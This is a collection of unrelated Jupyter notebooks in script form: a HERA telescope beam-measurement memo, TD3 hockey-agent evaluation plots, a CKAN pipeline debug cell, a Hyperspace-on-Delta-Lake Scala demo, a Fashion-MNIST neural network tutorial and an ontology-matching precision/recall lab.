# With the measurement and simulation both made, we can now plot the simulation against the model for the frequency range 110-130 MHz. We will also plot all of the 20 MHz and 10 MHz bandwidth beam measurements to see how they compare to the models.

# +
# Band-averaged, peak-normalized model over the measured frequency range.
freqs = np.arange(freq_ends[0],freq_ends[1])
model_beam = []
for freq in freqs:
    ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=15, n=100)
    model_beam.append(beam)
model_beam = np.mean(model_beam, axis = 0)
model_beam /= model_beam.max()
model_beam = 10*np.log10(model_beam)

# +
plt.figure(figsize=(12,7))
plt.plot(ang-90,model_beam,'k--',label=(r'Model: ' + freq_range))
# BUG FIX: the x values were previously sliced as theta[5:-3] while the y
# values used [4:-4], shifting the measurement by one bin relative to its
# angles; slice both identically.
plt.errorbar(theta[4:-4],obs_beam[4:-4],yerr=obs_std[4:-4],label='Data: ' + freq_range)
plt.legend()
plt.title('Model vs. Observed Extragalactic Sources: ' + freq_range)
plt.xlabel(r'Beam Angle ($^\circ$)')
plt.ylabel('Amplitude (dB)')
plt.grid()
plt.show()
# -

# As we can see above, the beam map created from measuring the flux of the sources matches the model well out to a zenith angle of ~$12^\circ$. It is possible that the noise level is being hit and that is what's causing the beam measurement to flatten out past ~$12^\circ$ from zenith, but this is something that will require more work.
#
# Now that we've successfully produced a beam measurement, we can use the same procedure as above for the rest of the 20 MHz bandwidth images.
# +
freq_range = ['110-130MHz','130-150MHz','150-170MHz','170-190MHz']
freq_ends = [[110,130],[130,150],[150,170],[170,190]]

fig, axs = plt.subplots(2,2, figsize=(15, 10), facecolor='w', edgecolor='k')
fig.subplots_adjust(hspace = .3)
axs = axs.ravel()

for i,freq_set in enumerate(freq_range):
    # Find the files and track the sources
    files = np.sort(glob('/data6/HERA/HERA_imaging/IDR2/' + freq_set + '/imgs/*fits'))
    plot_data = track_sources(files,tb)

    # Model the beam for a range of frequencies (average in linear space)
    freqs = np.arange(freq_ends[i][0],freq_ends[i][1])
    model_beam = []
    for freq in freqs:
        ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=15, n=100)
        model_beam.append(beam)
    model_beam = np.mean(model_beam, axis = 0)
    model_beam /= model_beam.max()
    model_beam = 10*np.log10(model_beam)

    # Find the measured beam and standard deviation for error bars
    theta, obs_beam, obs_std = observed_beam(plot_data)

    # Plot the beam and model
    axs[i].plot(ang-90,model_beam,'k--',label=(r'Model: ' + freq_set))
    # BUG FIX: slice x and y identically ([4:-4]) so each measurement is
    # plotted against its own zenith angle (was theta[5:-3]).
    axs[i].errorbar(theta[4:-4],obs_beam[4:-4],yerr=obs_std[4:-4],label='Data: ' + freq_set)
    axs[i].set_title(freq_set)
    axs[i].grid()
    axs[i].set_ylim([-25,5])
    axs[i].set_xlabel(r'Beam Angle ($^\circ$)')
    axs[i].set_ylabel(r'Amplitude (dB)')
plt.show()
# -

# The beam measurements in the plots above also seem to match well out to ~$12^\circ$. We can also recreate the plots above for 10 MHz bandwidth images beginning at 110 MHz and ending at 190 MHz.
# +
freq_range = ['110-120MHz','120-130MHz',
              '130-140MHz','140-150MHz',
              '150-160MHz','160-170MHz',
              '170-180MHz','180-190MHz']
freq_ends = [[110,120], [120,130], [130,140], [140,150],
             [150,160], [160,170], [170,180], [180,190]]

fig, axs = plt.subplots(4,2, figsize=(15, 20), facecolor='w', edgecolor='k')
fig.subplots_adjust(hspace = .3)
axs = axs.ravel()

for i,freq_set in enumerate(freq_range):
    # Find the files and track the sources
    files = np.sort(glob('/data6/HERA/HERA_imaging/IDR2/' + freq_set + '/imgs/*fits'))
    plot_data = track_sources(files,tb)
    # Keep only sources detected in every image.
    # NOTE(review): 77 is the number of images in this particular run --
    # consider deriving it from len(files) instead of hard-coding it.
    # (.items() replaces the Python-2-only .iteritems(); both work here.)
    cleaned_set = {k: v for k,v in plot_data.items() if len(v['Flux']) == 77}

    # Model the beam for a range of frequencies (average in linear space)
    freqs = np.arange(freq_ends[i][0],freq_ends[i][1])
    model_beam = []
    for freq in freqs:
        ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=15, n=100)
        model_beam.append(beam)
    model_beam = np.mean(model_beam, axis = 0)
    model_beam /= model_beam.max()
    model_beam = 10*np.log10(model_beam)

    # Find the observed beam and standard deviation for error bars
    theta, obs_beam, obs_std = observed_beam(cleaned_set)

    # Shift the higher frequency plots down to account for the center dip.
    # NOTE(review): these offsets are ad hoc visual corrections, not
    # calibrated values -- see the discussion of the center dip below.
    if i == 5:
        obs_beam -= 0.5
    if i == 6:
        obs_beam -= 0.75
    if i == 7:
        obs_beam -= 1.25

    # Plot the beam and model
    axs[i].plot(ang-90,model_beam,'k--',label=(r'Model: ' + freq_set))
    # BUG FIX: slice x and y identically ([4:-4]) so each measurement is
    # plotted against its own zenith angle (was theta[5:-3]).
    axs[i].errorbar(theta[4:-4],obs_beam[4:-4],yerr=obs_std[4:-4],label='Data: ' + freq_set)
    axs[i].set_title(freq_set)
    axs[i].grid()
    axs[i].set_ylim([-25,5])
    axs[i].set_xlabel(r'Beam Angle ($^\circ$)')
    if i % 2 == 0:
        axs[i].set_ylabel(r'Amplitude (dBi)')
plt.show()
# -

# We can see in this set of plots that the beam measurements match the model well, but not quite as well as the 20 MHz bandwidth images. One interesting observation that can be made from these plots is that at higher frequencies there are dips in the beam measurements near zenith that don't appear in the 20 MHz bandwidth measurements. This may be a result of the weighting that was used for imaging the data or possibly sidelobes from other sources contaminating the measurement. Regardless, this is something that will require further investigation.

# ## 5. Future Work

# - Investigate the cause of the dips near the beam center in the higher frequency 10 MHz bandwidth beam measurements
#     - Why don't the same dips appear in 20 MHz bandwidth beam measurements?
#     - Current IDR2.1 images are using a briggs weighting parameter in CASA's CLEAN command that is shifted more closely to uniform
#     - What might the effect of imaging with uniform and natural weighting have on the shape of the observed beam?
# - Model the noise level for certain frequencies to test whether or not we are actually hitting the noise level
#     - Simple comparison might be using the rms of noise on the edge of the image to see if the value is consistent with the "noise" level we see in the beam measurement
notebooks/Beam_Mapping_Memo.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rc
rc('font', **{'family': 'serif', 'sans-serif': ['tgpagella'], 'size': 18})
rc('text', usetex=True)

from utils import moving_average
import laserhockey.hockey_env as h_env
# -

def plot_training_episode_return(eval_dicts, labels, colors):
    """Plot the smoothed per-episode return collected during training.

    eval_dicts: list of result dicts with a 'train_rewards' entry;
    labels/colors: one legend label and matplotlib color per dict.
    """
    print('Episode return during training:')
    plt.figure(figsize=(10, 4))
    for i, eval_dict in enumerate(eval_dicts):
        train_rewards = eval_dict['train_rewards']
        w = 400  # moving-average window (episodes)
        plt.plot(
            moving_average(train_rewards, w),
            label=f'{labels[i]}', linewidth=1.5, color=colors[i]
        )
    plt.xlabel('Episodes')
    plt.ylabel('Return')
    plt.legend(loc='lower right')
    plt.grid()
    plt.show()

def plot_evaluation_episode_return(eval_dicts, labels, colors, w=10, mode='valid', eval_freq=5000):
    """Plot the smoothed mean evaluation return over training time.

    w/mode are the moving-average window and numpy convolution mode;
    eval_freq is the number of time steps between evaluation runs.
    The shaded band is the smoothed mean +/- (std / 4).
    """
    print('Average episode return in the evaluation during training:')
    plt.figure(figsize=(10, 4))
    for i, eval_dict in enumerate(eval_dicts):
        eval_rewards = eval_dict['eval_rewards']
        eval_mean = np.asarray([np.mean(eval_step) for eval_step in eval_rewards])
        eval_std = np.asarray([np.std(eval_step) for eval_step in eval_rewards])
        t = np.arange(0, eval_freq * len(eval_mean), eval_freq)
        # 'valid' convolution shortens the series by w - 1 samples.
        t = t[:-w + 1] if mode == 'valid' else t
        plt.plot(
            t, moving_average(eval_mean, w, mode=mode),
            label=f'{labels[i]}', linewidth=1.5, color=colors[i]
        )
        plt.fill_between(
            t,
            moving_average(eval_mean + eval_std / 4, w, mode=mode),
            moving_average(eval_mean - eval_std / 4, w, mode=mode),
            alpha=0.2, color=colors[i]
        )
    plt.xlabel('Time steps')
    plt.ylabel('Average Return')
    plt.legend(loc='lower right')
    plt.grid()
    plt.show()

def plot_final_evaluation_return(eval_dicts, labels, colors):
    """Box-plot the episode returns from the final evaluation of each run.

    Falls back to the last in-training evaluation when no separate final
    evaluation was stored.
    """
    print('Return in the final evaluation:')
    plt.figure(figsize=(10, 4))
    for i, eval_dict in enumerate(eval_dicts):
        final_eval_rewards = eval_dict['final_eval_rewards']
        if len(final_eval_rewards) == 0:
            final_eval_rewards = eval_dict['eval_rewards'][-1]
        bp = plt.boxplot(
            [final_eval_rewards],
            positions=[i + 1],
            labels=[labels[i]],
            patch_artist=True,
            showmeans=True,
            meanline=True,
            boxprops=dict(facecolor='white', color=colors[i]),
            capprops=dict(color=colors[i]),
            whiskerprops=dict(color=colors[i]),
            flierprops=dict(markeredgecolor=colors[i], color=colors[i]),
            medianprops=dict(color='black'),
            meanprops=dict(color='grey')
        )
    plt.ylabel('Return')
    # Use the last box's artists for the shared median/mean legend entries.
    plt.legend([bp['medians'][0], bp['means'][0]], ['median', 'mean'])
    plt.show()

def print_win_rates(eval_dicts, labels):
    """Print win/tie/loss rates from the final evaluation results.

    Game outcomes are encoded as +10.0 (win), 0.0 (tie), -10.0 (loss).
    """
    for i, eval_dict in enumerate(eval_dicts):
        final_eval_results = eval_dict['final_eval_results']
        if len(final_eval_results) == 0:
            final_eval_results = eval_dict['eval_results'][-1]
        num_results = len(final_eval_results)
        final_eval_results = np.asarray(final_eval_results)
        win_rate = np.sum(final_eval_results == 10.0) / num_results
        tie_rate = np.sum(final_eval_results == 0.0) / num_results
        loss_rate = np.sum(final_eval_results == -10.0) / num_results
        print(f'{labels[i]}: ' +
              f'Win-rate = {win_rate:.2f}, ' +
              f'Tie-rate = {tie_rate:.2f}, ' +
              f'Loss-rate = {loss_rate:.2f}')

def plot_all(eval_dicts, labels, colors=['C0', 'C1', 'C3']):
    """Produce all three plots plus the win-rate summary for a set of runs.

    The default `colors` list is never mutated, so the mutable default
    is safe here.
    """
    plot_training_episode_return(eval_dicts, labels, colors)
    plot_evaluation_episode_return(eval_dicts, labels, colors)
    plot_final_evaluation_return(eval_dicts, labels, colors)
    print_win_rates(eval_dicts, labels)

# Evaluate all TD3 modifications against the weak and strong opponent
eval_dicts = []
eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline.npy', allow_pickle=True).item())
eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+per.npy', allow_pickle=True).item())
eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+obs_norm.npy', allow_pickle=True).item())
labels = ['TD3', 'TD3 + PER', 'TD3 + ON']
plot_all(eval_dicts, labels)

# Evaluate all TD3 modifications against the weak opponent
# Helper: every result file lives in results/<name>.npy and was saved with
# np.save on a Python dict, so np.load(...).item() recovers the dict.
# (Replaces six copy-pasted blocks of identical np.load boilerplate; the
# f-string prefixes on those literals were unused and have been dropped.)
def load_eval_dicts(names):
    """Load the saved evaluation dictionaries for the given run names, in order."""
    return [np.load('results/' + name + '.npy', allow_pickle=True).item()
            for name in names]

eval_dicts = load_eval_dicts([
    'TD3_Hockey-v0_NORMAL_baseline_weak',
    'TD3_Hockey-v0_NORMAL_baseline_weak+per',
    'TD3_Hockey-v0_NORMAL_baseline_weak+obs_norm',
])
labels = ['TD3', 'TD3 + PER', 'TD3 + ON']
plot_all(eval_dicts, labels)

# Evaluate the batch size
eval_dicts = load_eval_dicts([
    'TD3_Hockey-v0_NORMAL_baseline',
    'TD3_Hockey-v0_NORMAL_baseline+batch_size_256',
])
labels = ['batch size = 100', 'batch size = 256']
plot_all(eval_dicts, labels)

# Evaluate the hidden dim
eval_dicts = load_eval_dicts([
    'TD3_Hockey-v0_NORMAL_baseline+hidden_dim_128',
    'TD3_Hockey-v0_NORMAL_baseline',
    'TD3_Hockey-v0_NORMAL_baseline+hidden_dim_512',
])
labels = ['hidden dim = 128', 'hidden dim = 256', 'hidden dim = 512']
plot_all(eval_dicts, labels, colors=['C3', 'C0', 'C1'])

# Evaluate the target update proportion tau
eval_dicts = load_eval_dicts([
    'TD3_Hockey-v0_NORMAL_baseline+tau_0_0025',
    'TD3_Hockey-v0_NORMAL_baseline',
    'TD3_Hockey-v0_NORMAL_baseline+tau_0_0100',
])
labels = ['tau = 0.0025', 'tau = 0.005', 'tau = 0.010']
plot_all(eval_dicts, labels, colors=['C3', 'C0', 'C1'])

# Evaluate the policy noise sigma_tilde
eval_dicts = load_eval_dicts([
    'TD3_Hockey-v0_NORMAL_baseline+policy_noise_0_1',
    'TD3_Hockey-v0_NORMAL_baseline',
    'TD3_Hockey-v0_NORMAL_baseline+policy_noise_0_4',
])
labels = ['sigma = 0.1', 'sigma = 0.2', 'sigma = 0.4']
plot_all(eval_dicts, labels, colors=['C3', 'C0', 'C1'])

# Evaluate TD3 with self-play
eval_dicts = load_eval_dicts(['TD3_Hockey-v0_NORMAL_all_improvements+self_play'])
labels = ['TD3 with self-play']
plot_all(eval_dicts, labels)
eval.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Initialize the ckan environment and requests session # + import os from dataflows import Flow, printer from dataflows_shell.processors import html_requests CKAN_PIPELINES_AUTH = os.environ['CKAN_URL_AUTH'] Flow( html_requests('get', f'https://{CKAN_PIPELINES_AUTH}@pipelines.odata.org.il/ckan/data/pipelines/upload_via_email/errors/', 'r.html.links' ), printer() ).process()[1] # -
ckan/ckanext-odata_org_il/ckanext/odata_org_il/pipelines/debug upload via email.ipynb
// -*- coding: utf-8 -*- // --- // jupyter: // jupytext: // text_representation: // extension: .scala // format_name: light // format_version: '1.5' // jupytext_version: 1.14.4 // kernelspec: // display_name: Synapse Spark // name: synapse_spark // --- // + [markdown] nteract={"transient": {"deleting": false}} // # Hyperspace for Delta Lake // // [Hyperspace](https://github.com/microsoft/hyperspace) now supports Delta Lake as its data source. This notebook covers how Hyperspace works with Delta Lake tables and updates on the tables. // // + [markdown] nteract={"transient": {"deleting": false}} // ### Setup configurations // + val sessionId = scala.util.Random.nextInt(1000000) val dataPath = s"/hyperspace/data-$sessionId"; val indexLocation = s"/hyperspace/indexes-$sessionId" // Use a random index location to avoid conflicts while using the notebook. spark.conf.set("spark.hyperspace.system.path", indexLocation) // Use HTML as a display mode. spark.conf.set("spark.hyperspace.explain.displayMode", "html") // Enable Hybrid scan regardless of the amount of data being appended/deleted. 
spark.conf.set("spark.hyperspace.index.hybridscan.maxAppendedRatio", "0.99") // default: 0.3 spark.conf.set("spark.hyperspace.index.hybridscan.maxDeletedRatio", "0.99") // default: 0.2 // + [markdown] nteract={"transient": {"deleting": false}} // ### Data preparation // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} import spark.implicits._ import org.apache.spark.sql.DataFrame // Sample department records val departments = Seq( (10, "Accounting", "New York"), (20, "Research", "Dallas"), (30, "Sales", "Chicago"), (40, "Operations", "Boston")) // Sample employee records val employees = Seq( (7369, "SMITH", 20), (7499, "ALLEN", 30), (7521, "WARD", 30), (7566, "JONES", 20), (7698, "BLAKE", 30), (7782, "CLARK", 10), (7788, "SCOTT", 20), (7839, "KING", 10), (7844, "TURNER", 30), (7876, "ADAMS", 20), (7900, "JAMES", 30), (7934, "MILLER", 10), (7902, "FORD", 20), (7654, "MARTIN", 30)) val empData = employees.toDF("empId", "empName", "deptId") val deptData = departments.toDF("deptId", "deptName", "location") val empLocation = s"$dataPath/employees" val deptLocation = s"$dataPath/departments" empData.write.format("delta").mode("overwrite").save(empLocation) deptData.write.format("delta").mode("overwrite").save(deptLocation) // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} val empDF = spark.read.format("delta").load(empLocation) val deptDF = spark.read.format("delta").load(deptLocation) // Disable BroadcastHashJoin so that Spark™ will use SortMergeJoin that Hyperspace indexes can optimize. spark.conf.set("spark.sql.autoBroadcastJoinThreshold", -1) val eqJoin = empDF. join(deptDF, empDF("deptId") === deptDF("deptId")). 
select(empDF("empName"), deptDF("deptName")) eqJoin.show // + [markdown] nteract={"transient": {"deleting": false}} // ### Create Hyperspace indexes over Delta Lake tables // // Hyperspace supports Delta Lake through an extensible data source builder framework. // In order to create and apply Hyperspace indexes on Delta Lake tables, you need to register Delta Lake source builder. // // spark.conf.set("spark.hyperspace.index.sources.fileBasedBuilders", // "**com.microsoft.hyperspace.index.sources.delta.DeltaLakeFileBasedSourceBuilder**,com.microsoft.hyperspace.index.sources.default.DefaultFileBasedSourceBuilder") // // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} import com.microsoft.hyperspace._ import com.microsoft.hyperspace.index._ // Register delta table source builder. spark.conf.set( "spark.hyperspace.index.sources.fileBasedBuilders", "com.microsoft.hyperspace.index.sources.delta.DeltaLakeFileBasedSourceBuilder," + "com.microsoft.hyperspace.index.sources.default.DefaultFileBasedSourceBuilder") // Enable source lineage to support the scenario with deleted files. spark.conf.set("spark.hyperspace.index.lineage.enabled", "true") val hyperspace = Hyperspace() val empIndexConfig = IndexConfig("empIndex", Seq("deptId"), Seq("empName")) val deptIndexConfig = IndexConfig("deptIndex", Seq("deptId"), Seq("deptName")) hyperspace.createIndex(empDF, empIndexConfig) hyperspace.createIndex(deptDF, deptIndexConfig) // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Enable Hypperspace to apply indexes. // For simplicity, FilterIndexRule is disabled in this demo. spark.enableHyperspace() // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scenario: check if newly created indexes are applied. val eqJoin = empDF. join(deptDF, empDF("deptId") === deptDF("deptId")). 
select(empDF("empName"), deptDF("deptName")) eqJoin.show hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } // + [markdown] nteract={"transient": {"deleting": false}} // ### Append data // // With Hybrid Scan, you can still utilize Hyperspace indexes after appending data to the table. // // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Add new employees. val newEmployees = Seq( (8000, "NEW-EMPLOYEE-1", 30), (8001, "NEW-EMPLOYEE-2", 10), (8002, "NEW-EMPLOYEE-3", 20), (8003, "NEW-EMPLOYEE-4", 30)) newEmployees.toDF("empId", "empName", "deptId").write.format("delta").mode("append").save(empLocation) val latestEmpDF = spark.read.format("delta").load(empLocation) latestEmpDF.show // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scneario: Hybrid scan is off. spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "false") val eqJoin = latestEmpDF. join(deptDF, latestEmpDF("deptId") === deptDF("deptId")). select(latestEmpDF("empName"), deptDF("deptName")) eqJoin.show hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scenario: Hybrid Scan is on. spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "true") val eqJoin = latestEmpDF. join(deptDF, latestEmpDF("deptId") === deptDF("deptId")). select(latestEmpDF("empName"), deptDF("deptName")) hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } eqJoin.show // + [markdown] nteract={"transient": {"deleting": false}} // ### Incremental refresh // // Other than using Hybrid Scan, you can also incrementally build Hyperspace indexes only for appended and deleted data. // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Incrementally build index on new employees only. 
// Incrementally refresh the index: build index data for the appended
// employee rows only, instead of rebuilding the whole index.
hyperspace.refreshIndex("empIndex", "incremental")

// + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}}
// Show refreshed index only contains new data.
spark.read.parquet(s"$indexLocation/empIndex/v__=1").show

// + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}}
// Scenario: Check if refreshed index is applied.
val eqJoin = latestEmpDF.
    join(deptDF, latestEmpDF("deptId") === deptDF("deptId")).
    select(latestEmpDF("empName"), deptDF("deptName"))

hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) }
eqJoin.show

// + [markdown] nteract={"transient": {"deleting": false}}
// ### Update data
//
// Updated data to the table can be handled as deleted and appended data by using Hybrid Scan or Incremental refresh.

// + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}}
import io.delta.tables._
import org.apache.spark.sql.functions._

val empDeltaTable = DeltaTable.forPath(spark, empLocation)

// Append "-SPECIAL" to "NEW-EMPLOYEE-2"'s name.
empDeltaTable.update(
    col("empName") === ("NEW-EMPLOYEE-2"),
    Map("empName" -> (concat(col("empName"), lit("-SPECIAL")))))

empDeltaTable.history.show(truncate = false)
empDeltaTable.toDF.show(truncate = false)

// + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}}
// Scenario: handle updated data.
val updatedEmpDF = empDeltaTable.toDF
val eqJoin = updatedEmpDF.
    join(deptDF, updatedEmpDF("deptId") === deptDF("deptId")).
    select(updatedEmpDF("empName"), deptDF("deptName"))

eqJoin.show(truncate = false)
hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) }

// + [markdown] nteract={"transient": {"deleting": false}}
// ### Enhancement of Delta Lake time travel query
//
// For a time travel query with an old table version, the latest version of the index can be used with Hybrid Scan, but usually there could be many appended and/or deleted files which reduce the benefit of indexes.
// To optimize it, Hyperspace tracks the history of the index version and table version for each refresh time and selects the closest index version based on the history.
//
//
// Note that this feature is not available in the current Hyperspace version and will be delivered in the next release.

// + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}}
// Scenario: Time travel to initial version of employees.
val oldEmpOnlyDF = spark.read.format("delta").option("versionAsOf", 0).load(empLocation)
val eqJoin = oldEmpOnlyDF.
    join(deptDF, oldEmpOnlyDF("deptId") === deptDF("deptId")).
    select(oldEmpOnlyDF("empName"), deptDF("deptName"))

hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) }
eqJoin.show
notebooks/scala/Hyperspace for Delta Lake.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Classifying images from Fashion MNIST using feedforward neural networks # # Dataset source: https://github.com/zalandoresearch/fashion-mnist # Detailed tutorial: https://jovian.ml/aakashns/04-feedforward-nn # + # Uncomment and run the commands below if imports fail # # !conda install numpy pandas pytorch torchvision cpuonly -c pytorch -y # # !pip install matplotlib --upgrade --quiet # - import torch import torchvision import numpy as np import matplotlib.pyplot as plt import torch.nn as nn import torch.nn.functional as F from torchvision.datasets import FashionMNIST from torchvision.transforms import ToTensor from torchvision.utils import make_grid from torch.utils.data.dataloader import DataLoader from torch.utils.data import random_split # %matplotlib inline project_name='fashion-feedforward-minimal' # ## Preparing the Data dataset = FashionMNIST(root='data/', download=True, transform=ToTensor()) test_dataset = FashionMNIST(root='data/', train=False, transform=ToTensor()) val_size = 10000 train_size = len(dataset) - val_size train_ds, val_ds = random_split(dataset, [train_size, val_size]) len(train_ds), len(val_ds) batch_size=128 train_loader = DataLoader(train_ds, batch_size, shuffle=True, num_workers=4, pin_memory=True) val_loader = DataLoader(val_ds, batch_size*2, num_workers=4, pin_memory=True) test_loader = DataLoader(test_dataset, batch_size*2, num_workers=4, pin_memory=True) for images, _ in train_loader: print('images.shape:', images.shape) plt.figure(figsize=(16,8)) plt.axis('off') plt.imshow(make_grid(images, nrow=16).permute((1, 2, 0))) break # ## Model def accuracy(outputs, labels): _, preds = torch.max(outputs, dim=1) return torch.tensor(torch.sum(preds == labels).item() / len(preds)) class MnistModel(nn.Module): """Feedfoward 
neural network with 1 hidden layer""" def __init__(self, in_size, out_size): super().__init__() # hidden layer self.linear1 = nn.Linear(in_size, 16) # hidden layer 2 self.linear2 = nn.Linear(16, 32) # output layer self.linear3 = nn.Linear(32, out_size) def forward(self, xb): # Flatten the image tensors out = xb.view(xb.size(0), -1) # Get intermediate outputs using hidden layer 1 out = self.linear1(out) # Apply activation function out = F.relu(out) # Get intermediate outputs using hidden layer 2 out = self.linear2(out) # Apply activation function out = F.relu(out) # Get predictions using output layer out = self.linear3(out) return out def training_step(self, batch): images, labels = batch out = self(images) # Generate predictions loss = F.cross_entropy(out, labels) # Calculate loss return loss def validation_step(self, batch): images, labels = batch out = self(images) # Generate predictions loss = F.cross_entropy(out, labels) # Calculate loss acc = accuracy(out, labels) # Calculate accuracy return {'val_loss': loss, 'val_acc': acc} def validation_epoch_end(self, outputs): batch_losses = [x['val_loss'] for x in outputs] epoch_loss = torch.stack(batch_losses).mean() # Combine losses batch_accs = [x['val_acc'] for x in outputs] epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()} def epoch_end(self, epoch, result): print("Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}".format(epoch, result['val_loss'], result['val_acc'])) # ## Using a GPU torch.cuda.is_available() def get_default_device(): """Pick GPU if available, else CPU""" if torch.cuda.is_available(): return torch.device('cuda') else: return torch.device('cpu') device = get_default_device() device def to_device(data, device): """Move tensor(s) to chosen device""" if isinstance(data, (list,tuple)): return [to_device(x, device) for x in data] return data.to(device, non_blocking=True) class DeviceDataLoader(): """Wrap a dataloader to move 
data to a device""" def __init__(self, dl, device): self.dl = dl self.device = device def __iter__(self): """Yield a batch of data after moving it to device""" for b in self.dl: yield to_device(b, self.device) def __len__(self): """Number of batches""" return len(self.dl) train_loader = DeviceDataLoader(train_loader, device) val_loader = DeviceDataLoader(val_loader, device) test_loader = DeviceDataLoader(test_loader, device) # ## Training the model # + def evaluate(model, val_loader): outputs = [model.validation_step(batch) for batch in val_loader] return model.validation_epoch_end(outputs) def fit(epochs, lr, model, train_loader, val_loader, opt_func=torch.optim.SGD): history = [] optimizer = opt_func(model.parameters(), lr) for epoch in range(epochs): # Training Phase for batch in train_loader: loss = model.training_step(batch) loss.backward() optimizer.step() optimizer.zero_grad() # Validation phase result = evaluate(model, val_loader) model.epoch_end(epoch, result) history.append(result) return history # - input_size = 784 num_classes = 10 model = MnistModel(input_size, out_size=num_classes) to_device(model, device) history = [evaluate(model, val_loader)] history history += fit(5, 0.5, model, train_loader, val_loader) history += fit(5, 0.1, model, train_loader, val_loader) losses = [x['val_loss'] for x in history] plt.plot(losses, '-x') plt.xlabel('epoch') plt.ylabel('loss') plt.title('Loss vs. No. of epochs'); accuracies = [x['val_acc'] for x in history] plt.plot(accuracies, '-x') plt.xlabel('epoch') plt.ylabel('accuracy') plt.title('Accuracy vs. No. 
of epochs'); # ## Prediction on Samples def predict_image(img, model): xb = to_device(img.unsqueeze(0), device) yb = model(xb) _, preds = torch.max(yb, dim=1) return preds[0].item() img, label = test_dataset[0] plt.imshow(img[0], cmap='gray') print('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)]) evaluate(model, test_loader) # ## Save and upload saved_weights_fname='fashion-feedforward.pth' torch.save(model.state_dict(), saved_weights_fname) # !pip install jovian --upgrade --quiet pip install --upgrade pip import jovian jovian.commit(project=project_name, environment=None, outputs=[saved_weights_fname])
.ipynb_checkpoints/fashion-feedforward-minimal-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # ### Dependencies from owlready2 import * #Shoudl be imported after owlready from rdflib import Graph # ### Methods to get the entity labels # + def getClasses(onto): return onto.classes() def getDataProperties(onto): return onto.data_properties() def getObjectProperties(onto): return onto.object_properties() def getIndividuals(onto): return onto.individuals() def getRDFSLabelsForEntity(entity): #if hasattr(entity, "label"): return entity.label def getRDFSLabelsForEntity(entity): #if hasattr(entity, "label"): return entity.label # - # ### Load ontology and print labels # + #Load ontology and print 5 classes with labels #Conference ontologies do not contain rdfs:label but a URI with a readable name urionto="cmt.owl" #urionto="ekaw.owl" #urionto="confOf.owl" #human and mouse contain rdfs:label but the URI has a concept ID #urionto="human.owl" #urionto="mouse.owl #Method from owlready onto = get_ontology(urionto).load() print("Classes in Ontology: " + str(len(list(getClasses(onto))))) i=0 for cls in getClasses(onto): i+=1 #Name of entity in URI. 
But in some cases it may be a #code like in mouse and human anatomy ontologies print(cls.iri) print("\t"+cls.name) #Labels from RDFS label print("\t"+str(getRDFSLabelsForEntity(cls))) if i==5: break # - # ### Method to compute Precision and Recall def compareWithReference(reference_mappings_file, system_mappings_file): ref_mappings = Graph() ref_mappings.parse(reference_mappings_file, format="ttl") system_mappings = Graph() system_mappings.parse(system_mappings_file, format="ttl") #We calculate precision and recall via true positives, false positives and false negatives #https://en.wikipedia.org/wiki/Precision_and_recall tp=0 fp=0 fn=0 for t in system_mappings: if t in ref_mappings: tp+=1 else: fp+=1 for t in ref_mappings: if not t in system_mappings: fn+=1 precision = tp/(tp+fp) recall = tp/(tp+fn) f_score = (2*precision*recall)/(precision+recall) #print(tp, tp2) #print(fp) #print(fn) print("Comparing '" + system_mappings_file + "' with '" + reference_mappings_file) print("\tPrecision: " + str(precision)) print("\tRecall: " + str(recall)) print("\tF-Score: " + str(f_score)) # ### Check results # + reference_mappings="anatomy-reference.ttl" system_mappings="anatomy-example-system.ttl" compareWithReference(reference_mappings, system_mappings) # For the lab you should compare, for example, # cmt-confOf-reference.ttl with the cmt-confOf-your-system.ttl you generate. # 